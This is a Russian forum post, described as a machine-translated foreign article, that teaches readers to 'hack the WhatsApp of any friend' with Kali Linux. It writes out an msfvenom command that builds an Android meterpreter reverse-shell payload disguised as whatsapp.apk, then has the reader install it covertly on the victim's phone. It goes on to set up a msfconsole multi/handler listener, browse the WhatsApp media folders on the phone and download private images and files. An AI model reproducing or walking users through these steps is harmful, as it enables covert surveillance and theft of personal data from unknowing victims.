Как взломать WhatsApp с помощью Kali Linux

Реакции
20
Кредиты
0 ₽
Баллы
148
Статья забугорная, гугл перевод.

Сегодня я расскажу вам, как вы можете взломать WhatsApp любого вашего друга и увидеть все данные его WhatsApp.
Мы проделаем весь этот процесс в нашей системе Linux, для чего нам нужно сначала скопировать некоторые команды и создайте полезную нагрузку, которую вы поместите на мобильный телефон вашего друга, а затем вы сможете взломать все данные своего мобилку друга от него.

Kali Linux - Сделайте полезную нагрузку​

msfvenom -p android / meterpreter / reverse_tcp lhost = (ВАШ IP) lport = (НОМЕР ВАШЕГО ПОРТА) R> whatsapp.apk

Чтобы создать полезную нагрузку, вам сначала нужно ввести несколько команд, которые вы найдете в разделе команды, и вы также показали на фотографии здесь, в хосте L, вы должны ввести IP-адрес своего машины и в порт L вы можете ввести любой номер порта.

После вставки команд ваша полезная нагрузка будет создана, и вы увидите такой интерфейс внутри вам сказали, каков размер вашей полезной нагрузки.
Теперь нам нужно поместить полезную нагрузку в телефон нашего друга и установить его. После установки полезной нагрузки ее необходимо открыть.

Kali Linux - откройте инструмент.​

msfconsole

После этого, чтобы управлять полезной нагрузкой на вашем компьютере, вы должны открыть инструмент с именем (msfconsole) из который вы можете контролировать свою полезную нагрузку. Когда вы введете имя клана в свой терминал, ваш инструмент запустится. чтобы открыть, как вы можете видеть на моем фото.

Kali Linux - заполните информацию о полезной нагрузке.​

использовать эксплойт / мульти / обработчик

Вы можете видеть, что мой инструмент открылся, теперь мне нужно связать свою полезную нагрузку с ее платой, для чего команда command будет найдена в разделе комментариев.

установить lhost (ВАШ IP)

Здесь вы должны ввести IP-адрес вашей машины на хосте L, а затем написать команду эксплойта и нажмите кнопку ввода, и вы увидите, что мой инструмент запущен и готов подключиться к полезной нагрузке.

Теперь вы можете видеть, что мой инструмент связан с полезной нагрузкой. Если вы не подключаетесь к полезной нагрузке, вам придется открыть ее еще раз. И тогда перед вами откроется какой-то интерфейс.

Kali Linux - перейдите в корневую папку мобильного устройства.​

CD /

Здесь вы были подключены к телефону, теперь вам нужно взять данные его WhatsApp из его phone, для чего сначала нужно зайти в корневые файлы его телефона, команда которого указана в как раздел.

Kali Linux - перейдите на SDCard.​

cd sdcard

Придя сюда, вы должны перейти на его SD-карту, где сохранены данные каждого приложения, команды которого также будут найдены в разделе комментариев.

Подойдя к SD-карте, вы увидите интерфейс некоторых таких приложений, где все приложения, установленные в его телефоне, будут видны всем.

Kali Linux - перейдите в папку WhatsApp.​

cd WhatsApp

Кстати, нужно зайти в папку с WhatsApp и взять оттуда данные, чьи команда будет найдена в разделе комментариев.

cd Media

После входа в WhatsApp перед вами будут открыты такие файлы, где вам нужно перейдите в папку мультимедиа.

После того, как вы зайдете в папку с мультимедиа, перед вами откроются данные WhatsApp вашего друга, теперь вы можете скачать что угодно отсюда.

cd WhatsApp \ Images

Как будто я перейду в папку с изображениями, скачаю изображение и покажу вам команды, которые вы найдете выше.

скачать (ВАШЕ ИМЯ ФАЙЛА)

После того, как изображение окажется в папке, вы должны написать имя файла, который вы хотите загрузить, после скачать и нажать кнопку ввода, и вы увидите, что мой файл загружен. Тогда вы сможете увидеть то, что хотите.

Используя этот метод, вы можете загружать медиа, документы и т. Д.
Для просмотра чатов вам необходимо скачать базы данных вашей жертвы, я сделаю для этого еще одно руководство. Я надеюсь, вы что-то узнаете из этого урока

Верх Низ